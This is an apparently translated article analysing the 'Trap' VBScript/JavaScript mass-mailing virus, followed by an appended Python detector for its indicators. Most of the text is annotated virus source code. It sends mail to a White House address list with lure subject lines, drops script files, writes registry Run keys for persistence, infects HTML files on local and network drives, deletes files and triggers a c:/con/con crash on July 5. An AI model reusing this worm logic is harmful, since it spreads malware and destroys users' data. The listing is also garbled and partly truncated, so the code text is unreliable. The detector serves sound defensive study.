At the beginning of July a vicious new virus called "Trap" (TRAP) appeared, and it broke out in full on July 5. Many websites and users have already been attacked by "Trap", resulting in paralysed network systems and serious loss of documents. The virus is a network scripting-language virus, written in both VBScript and JavaScript. It spreads through Outlook e-mail (a machine can be infected without the mail being opened) and through infected files, so it spreads very effectively. It can also directly attack the home page files of a Microsoft IIS server, infecting the website, and visitors are infected when they browse an infected website. Judging by the targets it attacks, "Trap" is probably a "domestic" virus, but it is understood that the virus actually appeared in June, first in South Korea.
I was unlucky enough to be hit by "Trap", which blue-screened my computer on July 5, so I studied the source code of "Trap". After some effort I finally worked out how the code operates; what follows is the working process of "Trap", with the source code explained in detail. The virus encrypts itself (using JavaScript encoding), so ordinary users cannot see the original virus code, but the infected VBS files are not encrypted; using them as the entry point, I obtained the source code quite easily.
'@ Thank you! Make use of other person to get rid of an enemy , Mswkey, HCUW, Code_Str, VBS_STR, JS_STR
DIM Defpath, Smailc, Max_Size
Dim WHB (), Title (10)
Smailc = 4
Redim WHB (SMAILC) 'White House Related Personnel Mail List
WHB (0) = "president@whitehouse.gov" WHB (1) = "vice.president@whitehouse.gov" WHB (2) = "first.lady@whitehouse.gov"
WHB (3) = "mrs.chey@whitehouse.gov"
'The theme of sending an email
Title (0) = "Thanks for Helping Me!"
Title (1) = "The Police Are Investigating The Robbery"
Title (2) = "An Application for a Job"
Title (3) = "The Aspects of An Application Process Pertinent TO OSI"
Title (4) = "What a pleasant weather. why not go out for a walk?"
Title (5) = "these Countries Have Gone / Been Through Too Many Wars"
Title (6) = "Weide Fixed On The 17th of April for the Wedding"
Title (7) = ""
Title (8) = "The Sitting IS Open!"
Title (9) = ""
DEFPATH = "C: /README.HTML" 'virus file
Max_size = 100000 'Defines the maximum size of infectious files
Mswkey = "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows /" HCUW = "HKEY_CURRENT_USER / SOFTWARE / Microsoft / WAB /" Main
Sub main () 'main program
ON Error Resume Next
Dim W_S
W_S = wscript.scriptfullname 'to get the path of the virus file itself
IF w_s = "" Then
Err.clear
SET FSO = CREATEOBJECT ("scripting.filesystemObject") 'Create a file system object
IF geterr Then 'identifying virus status
Randomize 'initialization random seed
Ra = int (RND () * 7) 'generates a random number
Document.write Title (ra) 'writes random content
ExecuteMail 'When executing the message status
Else
ExecutePage 'When executing a web page status
END IF
ELSE
Executevbs 'program executed in VBS file state
End if
End Sub
Function GeterR () 'ignores Error
If Err.Number <> 0 Then
Geterr = True
Err.Clear
Else
Geterr = FALSE
END IF
END FUNCTION
Sub executePage () 'program executed in web page state
On Error Resume Next
Dim HTML_STR, ADI, WDF, WDF2, WDF3, WDSF, WDSF2, VF
VBS_STR = getScriptcode ("VBScript") 'Get VBScript code
JS_STR = getJavaScript () 'get JavaScript code
Code_Str = Makescript (Encrypt (VBS_STR), TRUE) 'Gets encrypted script code
HTML_STR = Makehtml (Encrypt (VBS_STR), TRUE) 'Get encrypted complete HTML code
GF
'Define the path to the virus file
WDSF = W2 & "MDM.VBS" WDSF2 = W1 & "Profile.vbs"
WDF = W2 & "User.dll" 'Note WDF and WDF3 two files are very confused
WDF2 = W2 & "Readme.html" WDF3 = W2 & "System.dll"
'Creating a virus file
Set vf = fso.opentextfile (WDF, 2, true)
vf.write vbs_str
vf.close
set vf = fso.opentextFile (WDSF, 2, true)
vf.write vbs_str
vf.close
set vf = fso.opentextfile (WDSF2, 2, True)
vf.write vbs_str
vf.close
set vf = fso.opentextfile (WDF2, 2, true)
vf.write html_str
vf.close
set vf = fso.opentextFile (WDF3, 2, true)
vf.write code_str
vf.close
'Modify the registry so that the virus files are executed automatically at startup
WriteReg Mswkey & "CurrentVersion / Run / MDM", WDSF, ""
WriteReg Mswkey & "CurrentVersion / Runservices / Profile", WDSF2, ""
Sendmail 'Execute Send Mail Programs
Hackpage 'Performs Infection Website Program
Set adi = fso.drives
for Each X in Adi
If x.drivestype = 2 or x.drivestype = 3 Then 'Traverses all local hard drives and network shared drives
Call searchhtml (x & "/") 'Execute a file infection
End if
next
If Testuser Then 'Check User
Killhe 'performs delete file operations
ELSE
If Month (Date) & day (date) = "75" THEN ', if the system time is July 5
Set vf = fso.opentextfile (W2 & "75.htm", 2, true) 'Creating a system attack file
vf.write makescript ("Window.naviGate ('c: / con / con');", false) vf.close
WriteReg Mswkey & "CurrentVersion / Run / 75", W2 & "75.htm", "" 'automatic startup
WINDOW.NAVIGATE "C: / Con / Con" 'immediate blue screen; this uses a Windows bug that causes a 100% crash on Win9x systems (that is, an unrecoverable blue screen)
Else 'is not 7.5
IF fso.fileexists (W2 & "75.htm") THEN FSO.DELETEFILE W2 & "75.htm" 'Delete 75.htm
End IF
End IF
If fso.fileexists (defpath) Then fso.deletefile defpath 'Delete C: /Readme.html virus file
End Sub
Sub executemail () 'program executed in mail state
On Error Resume next
VBS_STR = GetScriptCode ("VBScript")
js_str = getjavaScript ()
SET STL = CREATEOBJECT ("Scriptlet.Typelib") 'Creating a TypeLib object
With stl
.reset
.path = defpath
.doc = makehtml (Encrypt (VBS_STR), TRUE)
.Write () 'Creating a C: /Readme.html file
End with
window.open defpath, "trap", "width = 1 height = 1 menubar = no scrollbars = no barbar = no" 'opens the window
end SUB
Sub Executevbs () 'program executed when the virus file runs as a VBS file
on error resume next
dim x, adi, wvbs, ws, vf
set fso = CreateObject ("Scripting.FileSystemObject")
set wvbs = CreateObject ("WScript.Shell")
Gf
wvbs.RegWrite MSWKEY & "Windows Scripting Host / Setings / Timeout", 0, "REG_DWORD"
set vf = fso.opentextfile (W2 & "System.dll", 1)
code_str = vf.readall ()
vf.close
Hackpage
Sendmail
Set Adi = fso.drives
for Each X in Adi
IF X.Drivestype = 2 or x.drivestype = 3 THEN
CALL SEARCHHTML (X & "/")
End if
Next
If Testuser Then Killhe
End Sub
SUB GF () 'Getting System Path
W1 = fso.getspecialfolder (0) & "/"
w2 = fso.getspecialfolder (1) & "/"
End Sub
Function Readreg (key_str) 'Read Registry
SET TMPS = CreateObject ("wscript.shell")
readreg = tmps.regread (key_str)
set tmps = Nothing
end function
Function WriteReg (Key_STR, NewValue, VTYPE) 'Write Registry
set tmps = CreateObject ("WScript.Shell")
if vtype = "" then
tmps.RegWrite key_str, Newvalue
else
tmps.RegWrite key_str, Newvalue, vtype
end if
set tmps = Nothing
end function
function MakeHtml (Sbuffer, iHTML) 'create the complete code of an HTML file
Dim randomize ra = int (RND () * 7) makehtml = "<" & "html> <" & "head> <" & "title>" & title (ra) "&" title> < "&" / Head> "& _
Function Makescript (CODESTR, IHTML) 'This routine is the virus's self-encryption process; it is fairly complicated and is not described further.
If html dam docuwrite docuwrite = "Document.write ('<' " & "'script language = javascript> / n' " & _ "jword" & " '/ n '" & " 'script > '); "DOCUWRITE = Docuwrite & Vbrlf &" Document.write (' <' "&"' script language = vbscript> / n ' "& _" NWORD "&" ' / n '" " 'Script>');" Makescript = "<" Script language = javascript> "& vbcrf &" var jword = "& _ chr (34) & encrypt (js_str) & chr (34) & vbcrf &" Var nword = "& _ chr (34) & CODESTR & CHR (34) & vbrlf &" nword = unescape (nword); "& VBCRLF & _" JWORD = Unescape (jword); "& Vbcrf & Docuwrite & Vbcrlf &" "&" Script> "else makesscript = <" "Script language = JavaScript>" & CodeStr & "
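
A defender's view of the listing above, as an added example (not part of the original article and not code from the virus): a static scanner that flags script or HTML text carrying the traits this analysis identifies, namely the Scriptlet.TypeLib file drop, the Run/RunServices entries, the dropped file names, the WSH timeout change and the con/con navigation. The indicator labels, the two-hit threshold and the sample inputs are assumptions constructed for illustration.

```python
import re

# Traits described in the annotated listing; the labels are hypothetical names.
INDICATORS = {
    "typelib_file_drop": r'createobject\("scriptlet\.typelib"\)',
    "run_key_persistence": r'currentversion/run(services)?/(mdm|profile|75)\b',
    "con_con_crash": r'c:/con/con',
    "wsh_timeout_disabled": r'windowsscriptinghost/sett?ings/timeout',
    "dropped_file_name": r'\b(mdm\.vbs|profile\.vbs|75\.htm)\b',
    "unescape_self_decode": r'unescape\(\w+\).*document\.write\(',
}

def normalise(text):
    """Lower-case, unify path separators and drop whitespace so spacing does not hide a match."""
    return re.sub(r"\s+", "", text.lower().replace("\\", "/"))

def scan(text):
    """Return the sorted labels of every indicator found in the text."""
    flat = normalise(text)
    return sorted(name for name, rx in INDICATORS.items() if re.search(rx, flat))

def is_suspect(text, threshold=2):
    """One trait alone is weak evidence; require several before flagging (assumed threshold)."""
    return len(scan(text)) >= threshold

# Constructed samples, not real captures.
SAMPLE_INFECTED = r'''
Set stl = CreateObject("Scriptlet.TypeLib")
WriteReg MSWKEY & "CurrentVersion\Run\MDM", w2 & "MDM.VBS", ""
'''
SAMPLE_PAYLOAD = ('WriteReg Mswkey & "CurrentVersion / Run / 75", W2 & "75.htm", ""\n'
                  'window.navigate("c:/con/con")')
SAMPLE_BENIGN = '<script>document.write(unescape("%3Cb%3Ehello%3C/b%3E"))</script>'

if __name__ == "__main__":
    for label, sample in [("infected", SAMPLE_INFECTED),
                          ("payload", SAMPLE_PAYLOAD),
                          ("benign", SAMPLE_BENIGN)]:
        print(label, scan(sample), is_suspect(sample))
```

The whitespace stripping is deliberate: the listing on this page carries stray spaces inside paths and key names, and the same patterns still match it.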